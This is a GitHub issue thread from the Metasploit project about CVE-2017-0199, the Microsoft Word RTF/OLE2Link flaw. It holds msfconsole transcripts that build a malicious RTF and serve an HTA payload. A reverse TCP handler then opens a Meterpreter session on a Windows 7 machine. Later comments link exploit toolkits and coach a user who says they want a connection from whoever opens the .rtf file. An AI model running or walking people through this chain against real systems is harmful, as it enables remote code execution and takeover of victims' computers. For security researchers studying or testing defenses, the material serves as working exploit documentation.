"\x03ObjInfo", _cb => 0x0012, _mse => 0x02, _bflags => 0x00, _sidLeftSib => 0xffffffff, _sidRightSib => 0xffffffff, _sidChild => 0xffffffff, _clsId => 00000000-0000-0000-0000-000000000000, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 00 00 00 00 00 00 00 00 |........| _sectStart => 0x00000007, _ulSize => 0x0000000000000006, data => --NOT OPENED YET-- }
}
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-294119947, or mute the thread https://github.com/notifications/unsubscribe-auth/ADbf0iae2mF2auyDbhq-BYNKFj86mbiYks5rvzU0gaJpZM4M5lMa .
@busterb @vysec CVE-2017-0199 module is created. Please wait more tests.
msf exploit(ms17_0199_rtf) > info
Name: MS14-017 Microsoft Word RTF Object Confusion
Module: exploit/windows/fileformat/ms17_0199_rtf
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-04-14
Provided by:
Haifei Li
ryHanson
wdormann
DidierStevens
vysec
Nixawk
Available targets:
Id Name
-- ----
0 Microsoft Office
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
TARGETURI http://192.168.206.144/poc.rtf yes The path to a hta file.
Payload information:
Description:
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute response in hta format. This bug was originally seen
being exploited in the wild starting in Oct 2016. This module was
created by reversing a public malware sample.
References:
https://cvedetails.com/cve/CVE-2017-0199/
https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/
https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html
https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html
https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf
https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/
https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
https://www.microsoft.com/en-us/download/details.aspx?id=10725
https://msdn.microsoft.com/en-us/library/dd942294.aspx
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf
msf exploit(ms17_0199_rtf) > run
[+] stored at /Users/nixawk/.msf4/local/local_1492191967.bin
~ ->> rtfobj /Users/nixawk/.msf4/local/local_1492191967.bin
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
===============================================================================
File: '/Users/nixawk/.msf4/local/local_1492191967.bin' - size: 5751 bytes
---+----------+-------------------------------+-------------------------------
id |index |OLE Object |OLE Package
---+----------+-------------------------------+-------------------------------
0 |000001BCh |format_id: 2 |Not an OLE Package
| |class name: 'OLE2Link' |
| |data size: 2560 |
---+----------+-------------------------------+-------------------------------
msf exploit(hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Powershell x86
msf exploit(hta_server) > set URIPATH /test
URIPATH => /test
msf exploit(hta_server) > run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.1.102:8080/test
[*] Server started.
msf exploit(hta_server) > use exploit/windows/fileformat/ms17_0199_rtf
msf exploit(ms17_0199_rtf) > show options
Module options (exploit/windows/fileformat/ms17_0199_rtf):
Name Current Setting Required Description
---- --------------- -------- -----------
TARGETURI http://example.com/test.rtf yes The path to a hta file.
Exploit target:
Id Name
-- ----
0 Microsoft Office
msf exploit(ms17_0199_rtf) > set TARGETURI http://192.168.1.102:8080/test
TARGETURI => http://192.168.1.102:8080/test
msf exploit(ms17_0199_rtf) > run
[+] stored at /Users/Open-Security/.msf4/local/local_1492193615.bin
msf exploit(ms17_0199_rtf) >
[*] 192.168.1.103 hta_server - Delivering Payload
[*] 192.168.1.103 hta_server - Delivering Payload
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:2187) at 2017-04-14 13:17:45 -0500
msf exploit(ms17_0199_rtf) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : JOHN
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : SECLAB
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >
Nice work @nixawk !
Nice work @nixawk :)
HI !Man.Can you provide ms17_0199_rtf,rb code @nixawk
ruby code?? @nixawk
metasploit?
@demonsec666 I think Nixawk will submit as a PR. This isn' t a support thread.
https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/
I will. Please wait serval days.
thanks @nixawk
@vysec @busterb @demonsec666 Please check https://github.com/rapid7/metasploit-framework/pull/8254
Nice work!thanks :)
gre
Nice one, thank you,
Meanwhile this was my attempt to get meterpreter shell through CVE-2017-0199
If dev team handles https://github.com/rapid7/metasploit-framework/pull/8253, maybe I'll try a new with meterpreter session.
Just FYI. OLE links made in 2016 differ from other versions such as 2013. Therefore I found that a 2016 document could not be triggered on a 2013 machine.
@vysec Could you share a copy ?
i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?
Hi,
Are you trying with "exploit/windows/misc/hta_server"? it was not working for me either. It pop-up a black screen but no reverse connection from reverse shell.
To overcome this I wrote a quick py script which could generate malicious doc based on @nixawk https://github.com/nixawk template and also act as a HTA web server to deliver the payloads.
Have a loot @ https://github.com/bhdresh/CVE-2017-0199
Regards, -Bhadresh
On 19 April 2017 at 08:03, hostbob notifications@github.com wrote:
i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-295072712, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLdfYQaVXFG8919vNyuXSF18LT7pLks5rxYd_gaJpZM4M5lMa .
Hi,
Are you trying with "exploit/windows/misc/hta_server"? it was not working for me either. It pop-up a blank screen but no reverse connection from reverse shell.
To overcome this I wrote a quick py script which could generate malicious doc based on @nixawk https://github.com/nixawk template and also act as a HTA web server to deliver the payloads.
Have a loot @ https://github.com/bhdresh/CVE-2017-0199
Regards, -Bhadresh
On 19 April 2017 at 09:08, Bhdresh bhdresh@gmail.com wrote:
Hi,
Are you trying with "exploit/windows/misc/hta_server"? it was not working for me either. It pop-up a black screen but no reverse connection from reverse shell.
To overcome this I wrote a quick py script which could generate malicious doc based on @nixawk https://github.com/nixawk template and also act as a HTA web server to deliver the payloads.
Have a loot @ https://github.com/bhdresh/CVE-2017-0199
Regards, -Bhadresh
On 19 April 2017 at 08:03, hostbob notifications@github.com wrote:
i have been trying to figure this out but not seems to get it, i host .hta file and insert it via insert-object but can't see any hta file executing. can someone share how this can be archived?
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-295072712, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLdfYQaVXFG8919vNyuXSF18LT7pLks5rxYd_gaJpZM4M5lMa .
Please try it with a IE cache clean.
thanks for your response
Am i doing this wrong, what i did was. i host an .hta file and insert into object in ms word then save it as .rtf
i have tried your python script before messaging here but it gives this error in the image
can u kindly put me through properly as i am using a custom .hta and custom way to get connection from user who run the .rtf file
@hostbob I've created a py script for the job.
https://github.com/nixawk/labs/blob/master/CVE-2017-0199/exploit.py
@hostbob,
Hosting and inserting an .hta file manually will directly execute it while inserting in to rtf.
For script, try to execute python script as "python cve-2017-0199_toolkit.py -h"
https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/master/cve-2017-0199_toolkit.py
Regards, -Bhadresh
I really appreciate your time bro, this is what i have done
https://2.lithi.io/qDoxsQ5.png https://2.lithi.io/z8WFm.png https://2.lithi.io/oXANtQ.png https://2.lithi.io/YyMnq.png
But getting error at the end of execution, kindly advice what i am missing
oh less i forget, tested on windows 7 32bit ms word 2007 and windows 8 ms word 2010 32bit also
If some of you are having difficulty reproducing the observation in Win7, you are likely using a fresh Win7, see https://www.youtube.com/watch?v=ac6LM7WAx64
I noted @nixawk observation regarding the registry key but it seems like a fresh Win7 regardless SP1 or not is not vulnerable. By "fresh", I mean hardly any patches installed. See the video for yourself. The VM that has black background also has reg_sz:ole32.dll for that registry key but was able to pop a calculator.
saw the video, but this was tested against windows 7 32bit vmware and windows 8 32bit vmware. is this also affect windows 8 and windows server 2008. i only got pop warning but file not executed
@hostbob, Looks like the document was generated properly.
As per instruction, once the document will be opened it will request http://2.lithi.io/5LjNsE.HTA and try to execute it.
Please share what is not working here? Are you not receiving "https://2.lithi.io/5LjNsE.HTA" request from target once document is opened or is this HTA not getting executed after delivery? It seems "https://2.lithi.io/5LjNsE.HTA" is not delivering the toolkit's HTA which is tested and working fine.
If you want to use custom HTA, please make sure it is getting executed and not having any error.
I recommend to point "https://2.lithi.io/5LjNsE.HTA" this to the machine where the tool is running and start the toolkit in exploitation mode (-M exp) with required parameters.
For this, you could follow the step 2 and 3 specified in the README.md or listed at https://github.com/bhdresh/CVE-2017-0199
Thanks a lot.
Regards, -Bhadresh
@hostbob,
@bhdresh asked good questions. Try with a simple test-case first, eg. the launch calculator HTA script that was shared earlier in this thread. If that works, then it has something to do with the custom HTA.
If even the simple test-case doesn't work, check that your web-server that is hosting the HTA file is forcing Content-Type as application/hta, otherwise the hta would just be rendered in the linked object.
@jymcheong , thank you :)
@hostbob , just follow the instructions provided in the guide at https://github.com/bhdresh/CVE-2017-0199, the toolkit could acts as a HTA + Web server so just point your HTA URL you are including in RTF to toolkit port in exploitation mode and its done :)
Please feel free of you have any question or issue.
Regards, -Bhadresh
ok i am gonna admit i am dump and can't seems to get this. i do not know what i am really missing. @bhdresh can you please inbox me your email or IM ID at edwardmoa@mail.ru? maybe an instant chat will solve this
Thank you @jymcheong for your contribution as well
@hostbob , no issues buddy, I sent you an email :)
@bhdresh i think you are busy, please anyone still have interest in helping out in this? i am using a custom hta file. what i do not understand is can this exploit work without using metasploit thing and is it only hta file it can work on? kindly share your idea brothers i will love to see me being successful testing this i hate trying to test something and see myself not getting it :D
@hostbob, I am updating python script at https://github.com/bhdresh/CVE-2017-0199 to push custom hta.
Usage: python cve-2017-0199.py -M exp -H custom.hta
Hope this will help.
you have been really helpful @bhdresh i really appreciate your help from the start. when do you think will be done?
Please try beta version from https://github.com/bhdresh/CVE-2017-0199/blob/v2.0-beta-3/cve-2017-0199_toolkit.py
On 20 April 2017 at 17:01, hostbob notifications@github.com wrote:
you have been really helpful @bhdresh https://github.com/bhdresh i really appreciate your help from the start. when do you think will be done?
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-295729305, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLdF63wi4L3fgjC6D_Re-EqO2TWJCks5rx1cSgaJpZM4M5lMa .
Just a sidenote, you will need to have Internet Explorer 10 installed for the exploit to work under (a fresh) Windows 7.
how about windows 8,8.1 and 10 both 32 and 64bit? it requires this as well?
As far as I know Windows 8 already comes with Internet Explorer 10 preinstalled, so I guess you don't need to do anything there - but I have not tried it. If you do, please share the results with us too. :)
References